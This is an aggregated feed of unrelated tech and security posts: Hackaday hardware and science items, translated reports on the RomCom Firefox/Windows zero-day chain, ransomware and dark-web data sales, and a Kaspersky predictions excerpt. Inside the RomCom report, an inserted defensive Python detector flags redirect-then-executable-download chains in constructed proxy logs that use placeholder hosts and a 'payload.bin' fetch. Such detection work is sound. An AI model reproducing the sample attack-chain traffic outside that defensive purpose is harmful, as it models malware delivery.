Disclaimer: When we refer to APT groups as Russian-speaking, Chinese-speaking, etc., we are referring to various artifacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) that contain words in those languages, based on information we have obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relationship, but rather indicates the languages used by the developers behind these APT artifacts.
Homebrew Phosphorescence Detector Looks for the Glow in Everyday Objects
Spoiler alert: almond butter isn’t phosphorescent. But powdered milk is, at least to the limit of detection of this homebrew phosphorescence detector.
Why spend a bunch of time and money on such a thing? The obvious answer is “Why not?”, but more specifically, when [lcamtuf]’s son took a shine (lol) to making phosphorescent compounds, it just seemed natural for dad to tag along in his own way. The basic concept of the detector is to build a light-tight test chamber that can be periodically and briefly flooded with UV light, charging up the putatively phosphorescent compounds within. A high-speed photodiode is then used to detect the afterglow, which can be quantified and displayed.
The analog end of the circuit was the far fussier end of the design, with a high-speed transimpedance amplifier to provide the needed current gain. Another scaling amp and a low-pass filter boost and clean up the signal for a 14-bit ADC. [lcamtuf] went to great lengths to make the front end as low-noise as possible, including ferrite beads and short leads to prevent picking up RF interference. The digital side has an AVR microcontroller that talks to the ADC and runs an LCD panel, plus switches the 340 nm LEDs on and off rapidly via a low gate capacitance MOSFET.
Unfortunately, not many things found randomly around the average home are all that phosphorescent. We’re not sure what [lcamtuf] tried other than the aforementioned foodstuffs, but we’d have thought something like table salt would do the trick, at least the iodized stuff. But no matter, the lessons learned along the way were worth the trip.
Even Apple Get Their Parts Wrong Sometimes
There can be few among those of us who produce printed circuit boards, who have not at some point placed a component the wrong way round, or with the wrong footprint. Usually this can be rectified with a bit of rework and a fresh board spin, but just occasionally these mishaps make it into the wild undetected. It seems nobody is immune, as [Doug Brown] is here to tell us with a tale of an Apple product with a misplaced capacitor.
The LC series of Macs came out through the early 1990s, and their pizza-box style cases could be found slowly turning yellow in universities and schools throughout that decade. Among them, the LCIII was the subject of a persistent rumor that it had a misplaced capacitor, so when [Doug] received an unmodified original machine he took a look. The investigation is quite simple, but revealing — there are three power supply rails and one of the capacitors does have a significant leak.
The explanation is simple enough: the designer had placed a capacitor on each rail with its negative side to the ground plane, but one of the rails delivers -5 volts. Thus that capacitor is the wrong way round, and must have failed pretty early in the lifetime of each LCIII. We’re curious, then, how the circuit remained functional, since so many of them went through their lives without the component being replaced. We’re guessing that there were enough other capacitors on the -5 volt line to provide enough smoothing.
The Most Sophisticated Zero-Day Attack of 2024 Discovered: RomCom and the Invisible Backdoor
In recent weeks, the threat landscape has been shaken by the emergence of attacks that exploit the lethal combination of two zero-day vulnerabilities, CVE-2024-9680 and CVE-2024-49039, affecting Firefox and Windows respectively. The attacks have been traced to a targeted campaign run by the cybercriminal group behind the RomCom backdoor. This operation demonstrates growing sophistication in attack methods and a dangerous speed in exploiting vulnerabilities.
The vulnerabilities and the attack mechanism
CVE-2024-9680, a use-after-free vulnerability in Firefox’s animation timelines, allows malicious code to be executed without any interaction from the victim. Attacks exploiting this vulnerability have been confirmed in the wild, and it carries a severity score of 9.8 out of 10, underlining how dangerous and critical it is.
The second vulnerability, CVE-2024-49039, a privilege escalation flaw in Windows, lets attackers compromise the system when combined with the Firefox zero-day, gaining full access to the victim’s device.
The compromise chain, discovered by ESET’s Damien Schaeffer, began with a malicious website designed to redirect users to a server hosting a zero-click exploit. No user interaction was required: once triggered, the exploit downloaded and installed the RomCom backdoor, an advanced piece of malware that lets attackers run remote commands, gather sensitive information and download additional modules to extend the malware’s capabilities.
The campaign, active between October and November 2024, mainly hit users in Europe and North America, targeting in particular the government, energy and healthcare sectors. The choice of these strategic sectors underlines RomCom’s interest in sensitive data and sabotage operations.
Map of potential victims as reported by ESET
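A zero-click chain like the one described here gives the user nothing to notice, but the redirect from the lure site to the exploit host and the subsequent download of the backdoor still pass through the organization’s web proxy. The following is an added example, not part of the article and not ESET’s code: it runs a generic detection over constructed proxy log lines (placeholder host names under the reserved .example domain, invented timings, a simplified CSV layout) and flags a client that was redirected to a different host and then fetched an executable from that host within a short window. The heuristic is deliberately general and is not an indicator specific to this campaign.

```python
"""Flag cross-host redirects followed by an executable download in proxy logs.

Added example, not from the article or from ESET. SAMPLE_LOG is constructed
data in a simplified CSV shape (timestamp, client, method, url, status,
content-type, Location header); the host names under .example and the
timings are placeholders, not real indicators.
"""
import csv
from datetime import datetime, timedelta
from io import StringIO
from urllib.parse import urlsplit

SAMPLE_LOG = """\
timestamp,client,method,url,status,content_type,location
2024-11-04T09:15:01,10.0.0.12,GET,http://news.lure.example/article,302,text/html,http://cdn.stage.example/frame
2024-11-04T09:15:01,10.0.0.12,GET,http://cdn.stage.example/frame,200,text/html,
2024-11-04T09:15:03,10.0.0.12,GET,http://cdn.stage.example/payload.bin,200,application/octet-stream,
2024-11-04T09:20:10,10.0.0.33,GET,http://shop.example/,301,text/html,https://shop.example/
2024-11-04T09:20:10,10.0.0.33,GET,https://shop.example/,200,text/html,
2024-11-04T09:40:00,10.0.0.12,GET,http://downloads.example/setup.exe,200,application/x-msdownload,
"""

# Content types that typically carry a native executable or raw payload.
BINARY_TYPES = {
    "application/octet-stream",
    "application/x-msdownload",
    "application/x-msdos-program",
    "application/vnd.microsoft.portable-executable",
}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def parse_log(text):
    """Turn the CSV text into dicts with parsed time, hosts and status."""
    rows = []
    for row in csv.DictReader(StringIO(text)):
        rows.append({
            "time": datetime.fromisoformat(row["timestamp"]),
            "client": row["client"],
            "url": row["url"],
            "host": urlsplit(row["url"]).hostname,
            "status": int(row["status"]),
            "content_type": row["content_type"].split(";")[0].strip().lower(),
            "location_host": urlsplit(row["location"]).hostname if row["location"] else None,
        })
    return rows


def find_redirect_download_chains(rows, window=timedelta(seconds=60)):
    """Per client: a redirect to a *different* host, then within `window`
    a response from that host whose content type is a binary payload."""
    pending = {}   # client -> list of (time, source_host, target_host)
    hits = []
    for r in sorted(rows, key=lambda x: x["time"]):   # stable sort keeps log order on ties
        cross_host = (r["status"] in REDIRECT_STATUSES and r["location_host"]
                      and r["location_host"] != r["host"])
        if cross_host:
            pending.setdefault(r["client"], []).append((r["time"], r["host"], r["location_host"]))
            continue
        if r["content_type"] in BINARY_TYPES:
            for t0, src, dst in pending.get(r["client"], []):
                delay = r["time"] - t0
                if dst == r["host"] and timedelta(0) <= delay <= window:
                    hits.append({"client": r["client"], "redirect_from": src,
                                 "download_host": dst, "url": r["url"],
                                 "delay_s": int(delay.total_seconds())})
                    break
    return hits


def analyze(text=SAMPLE_LOG):
    return find_redirect_download_chains(parse_log(text))


if __name__ == "__main__":
    for hit in analyze():
        print(hit)
```

Same-host redirects (the http-to-https hop for shop.example) and downloads with no preceding redirect are ignored, which keeps ordinary browsing quiet; legitimate download portals that bounce users to a CDN will still trigger it, so an allowlist of known download hosts is the usual next step before this becomes an alert rather than a hunt query.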
RomCom: the group behind the attacks
RomCom (also known as Tropical Scorpius or UNC2596) is a Russia-aligned cybercriminal group involved in numerous cybercrime and espionage campaigns. As early as 2023 it had exploited a zero-day through Microsoft Word, showing its ability to adapt to new vulnerabilities. In 2024, RomCom expanded its activity, hitting critical sectors in Ukraine, Europe and the United States and confirming the intensification of its operations to steal strategic data and damage critical infrastructure.
Patch timeliness
A timely response to the vulnerabilities was crucial to mitigating the impact of this campaign. Mozilla, for example, showed exceptional responsiveness: within 48 hours of ESET’s report, updates for Firefox and Thunderbird were distributed, protecting users against CVE-2024-9680. Microsoft also followed quickly, releasing the patch for CVE-2024-49039 on 12 November and closing an important entry point exploited by the attackers. These rapid interventions demonstrated the importance of effective collaboration between security researchers and technology companies to contain threats before they can spread on a wider scale.
Recommendations
- Immediate updates: promptly applying patches for browsers and operating systems is essential to protect devices from vulnerabilities like those exploited in this campaign.
- Continuous monitoring: deploying advanced detection tools to identify lateral movement and malicious commands is crucial to prevent attackers from going unnoticed.
- Staff awareness: training employees on the risks of fake websites and zero-click vulnerabilities can make the difference in preventing attacks.
Conclusion
The RomCom campaign highlights the growing sophistication of operations by nation-state-aligned cybercriminal groups, with increasingly frequent use of zero-day vulnerabilities to carry out targeted and devastating attacks. The combination of flaws in Firefox and Windows showed how exploits can bypass traditional protections, striking without any interaction from the victims. However, the speed with which Mozilla and Microsoft distributed patches underlines the importance of a rapid, coordinated response to limit the damage. This episode reminds us of the urgency of keeping systems up to date, actively monitoring threats and investing in cybersecurity, because the risks not only evolve but strike with unprecedented speed.
The article “The Most Sophisticated Zero-Day Attack of 2024 Discovered: RomCom and the Invisible Backdoor” comes from il blog della sicurezza informatica.
DIY Pipe Inspector Goes Where No Bot Has Gone Before
If you think your job sucks, be grateful you’re not this homebrew sewer inspection robot.
Before anyone gets upset, yes we know what [Stargate System] built here isn’t a robot at all; it’s more of a remotely operated vehicle. That doesn’t take away from the fact that this is a very cool build, especially since it has to work in one of the least hospitable and most unpleasant environments possible. The backstory of this project is that the sewer on a 50-year-old house kept backing up, and efforts to clear it only temporarily solved the problem. The cast iron lateral line was reconfigured at some point in its history to include a 120-degree bend, which left a blind spot for the camera used by a sewer inspection service. What’s worse, the bend was close to a joint with a line that once gave gutters and foundation drains access to the sewer.
To better visualize the problem, [Stargate] turned to his experience building bots to whip up something for the job. The bot had to be able to fit into the pipe and short enough to make the turn, plus it needed to be — erm, waterproof. It also needed to carry a camera and a light, and to be powered and controlled from the other end of the line. Most of the body of the bot, including the hull and the driving gear, was 3D printed from ABS, which allowed the seams to be sealed with acetone later. The drive tracks were only added after the original wheels didn’t perform well in testing. Controlling the gear motors and camera was up to a Raspberry Pi Zero, chosen mostly due to space constraints. An Ethernet shield provided connectivity to the surface over a Cat5 cable, and a homebrew PoE system provided power.
As interesting as the construction details were, the real treat is the down-hole footage. It’s not too graphic, but the blockage is pretty gnarly. We also greatly appreciated the field-expedient chain flail [Stargate] whipped up to bust up the big chunks of yuck and get the pipe back in shape. He did a little bit of robo-spelunking, too, as you do.
And no, this isn’t the only sewer bot we’ve ever featured.
Would an Indexing Feature Benefit Your Next Hinge Design?
[Angus] of Maker’s Muse has a video with a roundup of different 3D-printable hinge designs, and he points out that a great thing about 3D printing objects is that adding printable features to them is essentially free.
These hinges have an indexing feature that allows them to lock into place, no additional parts needed.
A great example of this is his experimental print-in-place butt hinge with indexing feature, which is a hinge that can lock without adding any additional parts. The whole video is worth a watch, but he shows off the experimental design at the 7:47 mark. The hinge can swing normally but when positioned just right, the squared-off pin within slots into a tapered track, locking the part in place.
Inspired by a handheld shopping basket with a lockable handle, [Angus] worked out a design of his own and demonstrates it with a small GoPro tripod whose legs can fold and lock in place. He admits it’s a demonstration of the concept more than a genuinely useful tripod, but it does show what’s possible with some careful design. Being entirely 3D printed in a single piece and requiring no additional hardware is awfully nice.
3D printing is very well-suited to this sort of thing, and it’s worth playing to a printer’s strengths to do for pennies what one would otherwise need dollars to accomplish.
Want some tips on designing things in a way that takes full advantage of what a 3D printer can achieve? Check out printing enclosures at an angle with minimal supports, leveraging the living hinge to print complex shapes flat (and fold them up for assembly), or even print a one-piece hinge that can actually withstand a serious load. All of those are full of tips, so keep them in mind the next time you design a part.
Bologna FC in the Crosshairs of RansomHub, Which Claims 200 GB of Data!
Ransomware gangs hit beloved football clubs too. Bologna FC, one of the historic clubs of Serie A, has been claimed as the victim of a ransomware attack allegedly carried out by the RansomHub group.
This attack shows how cybercriminals spare not even the world of sport, using the exfiltration of sensitive data as leverage to extort money. According to reports, 200 GB of confidential data were stolen, including company documents, market strategies and personal information of fans, players and staff.
At the moment we cannot confirm the accuracy of the news, as the organization has not yet released any official press statement on its website about the incident. This article should therefore be treated as an ‘intelligence source’.
RansomHub and the RaaS model
RansomHub operates under the Ransomware-as-a-Service (RaaS) model, a structure that lets affiliates launch attacks using tools supplied by the core group. This system is not limited to locking data through encryption: it relies on exfiltrating information and then threatening to publish it in order to increase the pressure on victims.
In the case of Bologna FC, the group allegedly stated that the club lacks adequate security measures, using the GDPR as a further tool of coercion. The fines provided for by the European regulation for failing to protect data can reach 10 million euros or 2% of turnover, a factor that could push victims to consider paying the ransom.
Stolen data
RansomHub claims to have stolen a large amount of information, including:
- Sponsorship contracts with financial details.
- The club’s business and commercial strategies.
- Personal data of players, fans and employees.
- Complete medical records of the players.
- Information on transfers and young talents.
- Passport scans and bank details, including those of head coach Vincenzo Italiano.
Some screenshots of these documents have reportedly already been published on the dark web, demonstrating the authenticity of the theft and intensifying the pressure on Bologna FC.
Conclusion
If confirmed, the attack on Bologna FC is a warning sign for all organizations, sporting or otherwise. The combination of advanced technologies and pressure tactics is turning ransomware into one of the most insidious threats of our time. After an attack like this, the world of sport can no longer ignore the growing cyber threat. It is crucial to adopt security strategies that include constant monitoring, the implementation of advanced technologies and a cybersecurity culture shared by everyone in the organization. Only then will it be possible to prevent the next club to be hit from seeing its data, and its reputation, put at risk.
As is our custom, we always leave room for a statement from the company should it wish to give us updates on the matter. We will be glad to publish such information in a dedicated article giving prominence to the issue.
RHC will monitor the evolution of the matter in order to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted email.
Global-Scale Hacker Attack: Oracle and Public Health in the Crosshairs
A malicious actor has published two listings on a dark web forum claiming to have obtained unauthorized access to Oracle’s cloud platform and to the servers of a major global healthcare company.
The cybercriminal’s claims raise significant concerns about the security of critical infrastructure and the protection of personal data worldwide.
At present we cannot confirm the authenticity of the news, as the organization has not yet published an official statement on its website about the incident. The information reported comes from public sources accessible on underground sites and should therefore be interpreted as an intelligence source, not as definitive confirmation.
First post: sale of Oracle Cloud API access
In the first post, the cybercriminal claimed to have compromised access to Oracle’s cloud platform, offering it for sale to the highest bidder for 100,000 dollars in cryptocurrency.
Oracle, a global giant in enterprise software and cloud solutions, is a pillar of the world’s technology. The compromise of exclusive API access to its platform could have devastating repercussions, potentially opening the door to large-scale exploitation of customer companies and entire digital ecosystems.
Second post: global health data exposed
In the second listing, the malicious actor raised the stakes further, claiming to have breached the servers of a major global healthcare company by exploiting Oracle’s infrastructure. According to the report, the attack led to access to, and the sale of, sensitive data on millions of citizens around the world. The compromised information allegedly includes:
- Personal identification data
- Telephone numbers
- Full names
- Email addresses
- Additional sensitive details
The actor also claims full control over the cloud servers and applications used by the healthcare company, putting the stolen data up for sale for 15,000 dollars and accepting cryptocurrencies such as Bitcoin, Ethereum or Litecoin.
To contact the criminal directly, a Tox address was even provided, signalling the intent to negotiate or sell information without leaving traces, through anonymous and encrypted channels.
The potential consequences of these breaches, if confirmed, are extremely serious. The personal data of millions of people could end up in the wrong hands, fuelling financial fraud, identity theft and other criminal activity. Moreover, the sale of API access to Oracle’s cloud platform could give further malicious actors the chance to carry out attacks on an even larger scale, harming corporate customers and critical infrastructure.
In the face of these threats, it is imperative to act quickly and decisively. Some key measures include:
- Monitor dark web forums: track activity related to these claims to detect developments and imminent risks.
- Verify the authenticity of the claims: work with security experts to identify the vulnerabilities and immediately limit their impact.
- Protect customers and end users: communicate transparently and offer support to those who may have been affected.
- Carry out in-depth audits: strengthen the security of Oracle systems and of business partners through rigorous checks and updates.
This malicious actor’s claims are not just a warning sign but a genuine call to action. Oracle and the companies involved must react urgently, adopting preventive and corrective measures to protect their systems and their users’ privacy.
FLOSS Weekly Episode 811: Elixir & Nerves – Real Embedded Linux
This week, Jonathan Bennett and Lars Wikman chat about Elixir and Nerves — a modern language that’s a take on Erlang, and an embedded Linux approach for running Elixir code on devices.
- underjord.io/feed/
- elixir-lang.org/
- nerves-project.org/
- Introducing Elixir and the ecosystem from Oredev 2023
- Introducing Nerves from Oredev 2024 (just released)
- The Soul of Erlang & Elixir, by Sasa Juric
Subscribe to catch the show live, and come to Hackaday for the rest of the story!
Did you know you can watch the live recording of the show right on our YouTube channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
Could Nuclear Be The Way To Produce Synthetic Fuel On The Cheap?
Fossil fuels can be a bit fussy to access, and geopolitics tends to make prices volatile. Burning them also takes carbon out of the ground and puts it into the atmosphere, with undesirable climate implications. The hunt for a solution has been on for quite some time.
Various synthetic fuels have been proposed as a solution, wherein carbon dioxide is captured from the air and chemically processed into useful fuel. Done properly, this could solve the climate issue where any fuel burned has its carbon later captured to make more fuel. The problem, though, is that this process is very energy intensive. Given the demands, it’s no surprise that some are looking towards nuclear reactors for the answer.
Hot To Go
Synthetic fuels are typically designed to replace conventional gasoline, diesel, or jet fuel. Credit: DOE, public domain
Burning fossil fuels is bad for the environment, but the problem is that they’re so very useful. Take transport, for example. Fossil fuels are perfect for this application because they pack a huge amount of energy into very little space while weighing relatively little to boot. At the same time, more than a third of global carbon emissions in 2021 came from transportation, according to the International Energy Agency. While electric vehicles are rapidly gaining market share in some areas, the complete phase-out of internal combustion engines is by no means a sure thing. Meanwhile, sectors like aviation are proving especially difficult to fully electrify. We want to get off fossil fuels, but circumstances demand we continue to use them.
Enter synthetic fuels. They’re essentially drop-in replacements for gasoline, diesel and jet fuel that are produced from CO2, water and clean energy rather than being refined from petroleum. When made using captured CO2 and cleanly-produced hydrogen, they have the potential to significantly reduce transport emissions when taking the whole system into account. All this, without requiring an entirely new fueling infrastructure or any changes for the end user.
By capturing carbon and then chemically processing it into a useful combustible fuel, we could keep using existing technologies that we already find practical, like combustion-engined vehicles. Their emissions would still be undesirable, but they’d be offset by the capture process used to make new fuel. The idea is to create a closed loop for carbon emissions. The problem is finding a synfuel production process that’s efficient—both in terms of carbon capture and chemical processing—and to find the energy to run it.
Indeed, synthesizing hydrocarbons is an energy-intensive process. The process is well-understood at this point. Capturing CO2 from the air, generating hydrogen via electrolysis, and catalytically combining them into fuels at high temperatures and pressures all require a lot of energy input. For synfuels to deliver real climate benefits, this energy must come from clean, non-fossil sources.
The Department of Energy has a strong interest in nuclear synfuel production. Credit: Argonne National Laboratory
What do we do when we need a lot of power with minimum emissions? We look at nuclear! Several U.S. Department of Energy labs are actively researching nuclear-powered synfuel production, and the DOE is funding a $20 million demonstration project in Utah. Meanwhile, in the United Kingdom, the Nuclear Industry Association has been urging the country to seize a leadership position in this emerging field as well.
On a very basic level, a conventional nuclear power plant could provide electricity for various processes involved in synthetic fuel production. However, that’s not the only way to go. For some processes, the heat from a nuclear reactor could be directly used to power the synfuel production process. That is, rather than using heat from a nuclear reaction to create steam to turn a turbine, a purpose-built synfuel reactor could just deliver heat directly to a chemical process that needs it. Nuclear heat could be useful for desalinating seawater for hydrogen electrolysis, or for carbon capture, too.
The chemistry involved in synfuel production is well understood. The problem is figuring out how to do it cheaply enough to be competitive with fossil fuels, while using clean sources of CO2 and hydrogen. Credit: Argonne National Laboratory
The question is whether all the effort will be worthwhile. Competing with regular old fossil fuels on price will be a must, even if some degree of subsidy is used to tip the scales in favor of synfuels. There are hopes that nuclear-produced synfuels could reach prices of $3 a gallon with the right feedstocks and input costs, but that’s words on a page at this stage. There is plenty of engineering to be done before you’ll be filling your car with 20 gallons of nuke gas at your local station.
Efficiency also comes into it, and this could play a big role in how synfuels pan out. Take cars, for example. Automakers have figured out how to make supremely efficient electric vehicles in the past decade. Electrical engineers have become experts at squirting power efficiently all over the country, and there are more EV charging stations than ever. Does it make sense to spin up bespoke nuclear synfuel plants to keep internal combustion alive, when the technology to replace it already exists? Arguments could be made for more demanding applications like trucking or aviation, but then the market for synfuels grows smaller.
Synthetic fuels are particularly attractive for the aviation industry, which has found electrification hard to achieve due to the limits of battery technology. Credit: US Air Force, public domain
In any case, nuclear synfuel holds great promise. Whether it can overcome the general resistance towards all nuclear technologies remains to be seen. Still, the tides may be changing on that front, and the future is anyone’s guess. If you’re a fan of fossil fuels and the like, be happy—there is hope yet that the flammable fluid market will roll on.
Retrotechtacular: The Deadly Shipmate
During World War II, shipboard life in the United States Navy was a gamble. No matter which theater of operations you found yourself in, the enemy was all around on land, sea, and air, ready to deliver a fatal blow and send your ship to the bottom. Fast forward a couple of decades and Navy life was just as hazardous but in a different way, as this Navy training film on the shipboard hazards of low-voltage electricity makes amply clear.
With the suitably scary title “115 Volts: A Deadly Shipmate,” the 1960 film details the many and various ways sailors could meet an untimely end, most of which seemed to circle back to attempts to make shipboard life a little more tolerable. The film centers not on the risks of a ship’s high-voltage installations, but rather the more familiar AC sockets used for appliances and lighting around most ships. The “familiarity breeds contempt” argument rings a touch hollow; given that most of these sailors appear to be in their 20s and 30s and rural electrification in the US was still only partially complete through the 1970s, chances are good that at least some of these sailors came from farms that still used kerosene lamps. But the point stands that plugging an unauthorized appliance into an outlet on a metal ship in a saltwater environment is a recipe for being the subject of a telegram back home.
The film shows just how dangerous mains voltage can be through a series of vignettes, many of which seem contrived but which were probably all too real to sailors in 1960. Many of the scenarios are service-specific, but a few bear keeping in mind around the house. Of particular note is drilling through a bulkhead and into a conduit; we’ve come perilously close to meeting the same end as the hapless Electrician’s Mate in the film doing much the same thing at home. As for up-cycling a discarded electric fan, all we can say is even brand new, that thing looks remarkably deadly.
The fact that they kept killing the same fellow over and over for each of these demonstrations doesn’t detract much from the central message: follow orders and you’ll probably stay alive. In an environment like that, it’s probably not bad advice.
Boss Byproducts: Corium Is Man-Made Lava
So now we’ve talked about all kinds of byproducts, including man-made (Fordite), nature-made (fulgurites), and one that’s a little of both (calthemites). Each of these is beautiful in its own way, but I’m not sure about the beauty and merit of corium — that which is created in a nuclear reactor core during a meltdown.
A necklace made to look like corium. Image via OSS-OSS
Corium has the consistency of lava and is made up of many things, including nuclear fuel, the products of fission, control rods, any structural parts of the reactor that were affected, and products of those parts’ reaction with the surrounding air, water, and steam.
If the reactor vessel itself is breached, corium can include molten concrete from the floor underneath. That said, if corium is hot enough, it can melt any concrete it comes in contact with.
So, I had to ask, is there corium jewelry? Not quite. Corium is dangerous and hard to come by. But that doesn’t stop artisans from imitating the substance with other materials.
Forming Corium
Chernobyl corium in steam discharge corridor. Image via ICTP
Corium lava was produced at both Chernobyl and Fukushima Dai’ichi, and on a smaller scale at Three Mile Island. It’s a rare thing, this man-made lava, and it’s only produced when humans gather enough highly-radioactive isotopes to start a chain reaction.
When a nuclear meltdown occurs, the fission reaction occurring within the reactor is no longer sufficiently cooled and contained to keep the rods, cases, core containment vessel, et cetera cool. Heat builds rapidly, produced by the fission of uranium-235 and plutonium-239.
If the chain reaction of fission and decays is allowed to go on, the heat will build up enough that the fuel rods start to bend and eventually melt. Usually, this is controlled by cooling water and control rods that are able to absorb some of the neutrons created by fission and decay. But if the fuel rods become fully molten, then you’ve got a meltdown on your hands.
April 26, 1986
The largest formation of corium in existence occurred during the Chernobyl disaster. In fact, so much corium issued forth that the molten mass dripped underneath to form stalactites, stalagmites, and lava flows such as the Elephant’s Foot.
The Chernobyl Elephant’s Foot, a large mass of corium. Image via Wikipedia
Chernobyl’s corium was formed over several days in three phases, the first of which lasted only seconds. The second stage lasted six days and comprised the interaction of the lava with silica-based structural materials like sand, concrete, and serpentinite. Finally, fuel lamination took place, and the molten corium penetrated the floors and solidified.
The corium at Chernobyl consists of uranium dioxide fuel, zircaloy cladding, concrete, and the serpentinite that had been packed around the reactor to serve as thermal insulation. Analysis has since shown that the corium reached a maximum temperature of 2,255 °C (4,091 °F). Far from cooling quickly, it remained above 1,660 °C (3,020 °F) for several days.
Chernobyl Corium
There are five types of material in Chernobyl’s corium:
- black ceramics: dark black, glassy material with a highly pitted surface
- brown ceramics: brown, glassy material that is both glossy and dull
- slag-like granulated corium: these are glassy granules with a crust and range from gray-magenta to a dark brown. These were formed by extended contact of brown ceramics with water
- pumice: grayish-brown porous formations that were formed when molten brown ceramic came into contact with water
- metal: both molten and solidified
The Elephant’s Foot is a large mass composed of black corium and has many layers. It resembles tree bark on its surface. In order to get to where it was discovered in December 1986 (15 meters southeast of the reactor in a maintenance corridor), the corium burned through 2 m (6 ft) of reinforced concrete, then traveled through pipes and fissures and flowed down a hallway.
Three Mile Island
By comparison, the accident at Three Mile Island was a slow, partial meltdown. Within two minutes, over 40,000 pounds of various materials melted and relocated. And although a pool of corium formed at the bottom of the reactor vessel, it wasn’t breached.
Eventually, scientists took samples from the reactor and discovered two masses of dull, grey corium with a few yellow areas — one in the fuel assembly, and the other on the lower head of the reactor vessel. They found the corium to be mostly molten fuel and cladding. Elementally, it was mostly uranium, along with zirconium, oxygen, stainless steel, and an alloy called Inconel. Some of the samples included silver and indium from the control rods.
Melting and Smelting
Man-made lava is a terrible, amazing thing that, ideally, will remain rare. But not all byproducts are rare, and certainly not all of them have cool names. What could I possibly be talking about? Stay tuned!
Unfaithful Employees 2.0: When the US IT Technician Has That Certain North Korean Accent
It seems that the problem of fake North Korean IT specialists has spread beyond US companies. According to Microsoft analysts, similar schemes are operating all over the world, including in China, Russia and other countries.
Recall that in recent months there have been reports that North Korean hackers are secretly obtaining jobs at American companies. They then attempt to install malware on their work computers, as well as stealing data from corporate networks and demanding ransoms.
At the same time, cybersecurity specialists believe that not all North Korean IT specialists are involved in malicious activity and cyber espionage. Some actually do the work, and the high salaries they receive, according to researchers, “generate revenue for North Korea’s nuclear program”.
For their part, US authorities are fighting this phenomenon by uncovering the people who help carry out such operations in the United States. In short, these facilitators are setting up laptop farms and moving the stolen money abroad.
Now Microsoft specialists have drawn up a report and presented it at the CYBERWARCON conference. According to Microsoft, North Korea circumvents sanctions and financial barriers by placing its “IT specialists” in companies in Russia, China and other countries. Thousands of workers have been placed with the help of third parties, who provide bank accounts, phones, SIM cards, and accounts on social media and job portals.
Hundreds of fake profiles and portfolios of fake North Korean IT professionals have been discovered on GitHub. Last month, Microsoft discovered a public repository linked to these operations. The repository contained résumés, emails, VPS and VPN account data, and various tutorials. It also held information on wallets, accounts (LinkedIn, GitHub, Upwork, TeamViewer, Telegram, Skype) and even pay slips.
Fake profiles of North Korean specialists
Microsoft reiterated a phenomenon that has already been reported. The fake IT specialists use stolen personal data to apply for jobs. They add stolen photos to documents. They use artificial intelligence tools to create résumés and application forms. In addition, the researchers warn that the attackers actively use voice-changing software.
“Although we have not detected attackers using AI-based voice and video changing tactics, it is certain that in the future such tools will be used to deceive companies,” Microsoft warns.
The article Unfaithful Employees 2.0: When the US IT Technician Has That Certain North Korean Accent originally appeared on il blog della sicurezza informatica.
Life Found On Ryugu Asteroid Sample, But It Looks Very Familiar
Samples taken from the space-returned piece of asteroid Ryugu were collected and prepared under strict anti-contamination controls. Inside the cleanest of clean rooms, a tiny particle was collected from the returned sample with sterilized tools in a nitrogen atmosphere and stored in airtight containers before being embedded in an epoxy block for scanning electron microscopy.
It’s hard to imagine what more one could do, but despite all the precautions taken, the samples were rapidly colonized by terrestrial microorganisms. It affected only the upper few microns of the sample surface, but it happened. That’s what the images above show.
The surface of Ryugu from Rover 1B’s camera. Source: JAXA
Obtaining a sample from asteroid Ryugu was a triumph. Could this organic matter have come from the asteroid itself? In a word, no. Researchers have concluded the microorganisms are almost certainly terrestrial bacteria that contaminated the sample during collection, despite the precautions taken.
You can read the study to get all the details, but it seems that microorganisms — our world’s greatest colonizers — can circumvent contamination controls. No surprise, in a way. Every corner of our world is absolutely awash in microbial life. Opening samples on Earth comes with challenges.
As for off-Earth, robots may be doing the exploration, but despite NASA assembling landers in clean-room environments, we may already have inadvertently exported terrestrial microbes to the Moon and Mars. The search for life to which we are not related is one of science’s and humanity’s greatest quests, but it seems life found in space-returned samples will end up looking awfully familiar until we step up our game.
Consumer and privacy predictions for 2025
Overview of 2024 consumer cyberthreats and trends predictions
Part of the Kaspersky Security Bulletin, our predictions for 2024 identified key consumer cyberthreats and trends shaped by global events, technological advances and evolving user behavior.
Last year, we suggested that charity-related scams would increase globally. While cybercriminals exploited humanitarian crises and charitable causes, taking advantage of both major conflicts and new donation methods, the anticipated boost could not be confirmed. We witnessed cases of such efforts being abused, particularly those associated with the Israeli-Hamas conflict, with Kaspersky researchers uncovering more than 540 scam emails and numerous fraudulent websites that imitated legitimate humanitarian aid campaigns. However, charity platforms’ ever-evolving protective measures and the growing integration of charitable giving into day-to-day online shopping have given users more secure and convenient ways to make a contribution without exposing themselves to scammers, which also bore out our prediction about such collaboration.
In line with our expectations regarding VPN usage and internet segmentation, 2024 saw a notable global surge in the popularity of VPN and proxy services, with applications gaining significant popularity across various countries. This trend is largely driven by users seeking to bypass regional content restrictions and enhance online privacy. However, this increased demand has attracted malicious actors. Cybercriminals are exploiting the popularity of VPN services by spreading potentially harmful applications disguised as legitimate VPN tools. Kaspersky has reported a surge in these malicious apps, capable of compromising user data and security.
In 2024, the prediction that national security concerns would lead to restrictions imposed on apps and services, thus creating new security issues, proved accurate. Governments worldwide used security as a justification for limiting access to popular platforms, often leaving users with fewer and potentially less secure alternatives in the process. Notable developments included the temporary suspension of X (formerly Twitter) in Brazil by a court ruling, ongoing discussions about TikTok’s ownership structure in the United States, and the removal of various messaging apps from Apple’s App Store in China.
Our prediction that play-to-earn (P2E) gaming platforms would attract cybercriminals was also fulfilled, with multiple cases highlighting the sector’s vulnerabilities. Kaspersky researchers uncovered phishing schemes targeting Hamster Kombat players, a popular Telegram-based clicker game, where attackers used fraudulent links to steal credentials and gain unauthorized access to user accounts. Similarly, Kaspersky GReAT discovered a scheme devised by the Lazarus group, which developed a malicious decoy game disguised as a legitimate P2E platform containing sophisticated malware designed to steal cryptocurrency and sensitive user data.
Despite the growing need driven by advancements in generative AI technology, the prediction about the development of a universal deepfake verification tool remained unfulfilled in 2024. While user-generated content (UGC) platforms like TikTok and Instagram have introduced policies requiring creators to label AI-generated content, the effectiveness of these measures is limited by their reliance on users’ honesty and awareness.
